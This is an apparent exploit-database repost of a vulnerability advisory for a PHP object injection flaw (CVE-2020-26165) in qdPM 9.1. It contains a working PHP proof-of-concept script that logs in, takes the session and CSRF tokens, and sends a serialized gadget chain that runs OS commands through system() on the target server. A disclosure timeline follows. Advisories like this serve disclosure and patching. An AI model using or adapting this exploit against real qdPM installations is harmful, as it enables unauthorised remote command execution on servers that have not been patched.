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qdPM 9.1 PHP Object Injection Vulnerability

Security Risk Medium
web applications
Date add
qdPM <= 9.1 (executeExport) PHP Object Injection Vulnerability

[-] Software Link:


[-] Affected Versions:

Version 9.1 and prior versions.

[-] Vulnerability Description:

The vulnerability is located in the /core/apps/qdPM/modules/timeReport/actions/actions.class.php
script, specifically within the timeReportActions::executeExport() method:

295.  public function executeExport(sfWebRequest $request)
296.  { 
297.   $separator = "\t";
298.   $format = $request->getParameter('format');
299.   $filename = $request->getParameter('filename');
301.   $export = unserialize($request->getParameter('export'));

User input passed through the "export" request parameter is not properly sanitized before being
used in a call to the unserialize() function at line 301. This can be exploited by malicious users
to inject arbitrary PHP objects into the application scope, allowing them to carry out a variety
of attacks, such as executing arbitrary OS commands.

[-] Proof of Concept:


\n"; print "\nExample....: php $argv[0] http://localhost/qdpm/ user passwd"; print "\nExample....: php $argv[0] https://test.com/qdpm/ evil hacker\n\n"; die(); } list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); print "[-] Logging in with username '{$user}' and password '{$pass}'\n"; $resp = curl_exec($ch); if (!preg_match("/Cookie: [^;]+/", $resp, $sid)) die("[-] Session ID not found!\n"); if (!preg_match('/_csrf_token\]" value="([^"]+)"/', $resp, $csrf)) die("[-] CSRF token not found!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}index.php/login"); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); curl_setopt($ch, CURLOPT_POSTFIELDS, "login[email]={$user}&login[password]={$pass}&login[_csrf_token]={$csrf[1]}"); if (!preg_match("/Cookie: [^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n"); print "[-] Logged-in! Exploiting PHP Object Injection...\n"; class sfOutputEscaperObjectDecorator { protected $escapingMethod = "system"; protected $value = "id; whoami"; } $obj = rawurlencode(str_replace(['s:', chr(0)], ['S:', '\00'], serialize([[new sfOutputEscaperObjectDecorator]]))); curl_setopt($ch, CURLOPT_URL, "{$url}index.php/timeReport/export?export={$obj}"); curl_setopt($ch, CURLOPT_POST, false); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); print curl_exec($ch);

[-] Solution:

No official solution is currently available.

[-] Disclosure Timeline:

[29/02/2020] - Vendor notified
[08/04/2020] - No response, vendor contacted again
[09/04/2020] - Vendor replies they will fix the vulnerability in a summer release
[30/09/2020] - Summer is gone and a new version hasn't been released, vendor contacted again
[30/09/2020] - Vendor replies they're working on version 10, and should be ready in this year
[30/09/2020] - CVE number requested and assigned
[02/12/2020] - Vendor informed about public disclosure by the end of the year
[30/12/2020] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2020-26165 to this vulnerability.

#  0day.today [2024-12-26]  #